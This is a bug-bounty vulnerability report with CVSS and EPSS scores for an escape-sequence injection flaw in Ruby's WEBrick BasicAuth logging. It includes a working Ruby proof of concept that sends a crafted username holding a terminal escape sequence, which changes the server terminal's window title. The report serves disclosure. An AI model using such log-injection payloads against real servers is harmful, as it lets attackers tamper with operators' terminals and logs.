Ruby: Escape sequence injection vulnerability in WEBrick BasicAuth

2017-04-2410:25:41

mame

hackerone.com

$500

143

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.012 Low

EPSS

Percentile

83.2%

JSON

WEBrick BasicAuth outputs any non-existing user name to logs without sanitizing. By exploting this, an attacker can inject malicious escape sequences to its logs. This issue is exactly the same as the old already-fixed vulnerability.

How to reproduce:

Run this WEBrick server program in a terminal.

require "webrick"
require "webrick/httpauth"

srv = WEBrick::HTTPServer.new({ Port: 34567 })
db = WEBrick::HTTPAuth::Htpasswd.new("dot.htpasswd")
authenticator = WEBrick::HTTPAuth::BasicAuth.new(UserDB: db, Realm: "realm")
srv.mount_proc("/") do |req, res|
  authenticator.authenticate(req, res)
  res.body = "foobar"
end
srv.start

Run this attack access program in another terminal.

require "open-uri"

open("http://localhost:34567/login",
  http_basic_authentication: [
      "ESCAPE SEQUENCE HERE-&gt;\e]2;BOOM!\a&lt;-SEE WINDOW TITLE",
      "passwd"
]).read

See the first terminal that runs the server. You will see a line like this, and its window title changed “BOOM!”.

[2017-04-24 19:23:46] ERROR Basic realm: ESCAPE SEQUENCE HERE-&gt;&lt;-SEE WINDOW TITLE: the user is not allowed.

Note: I’m a member of the ruby-core team, but I’m not involved with development of WEBrick. I did not create the bug, of course. I will happily accept any bounty if any :-)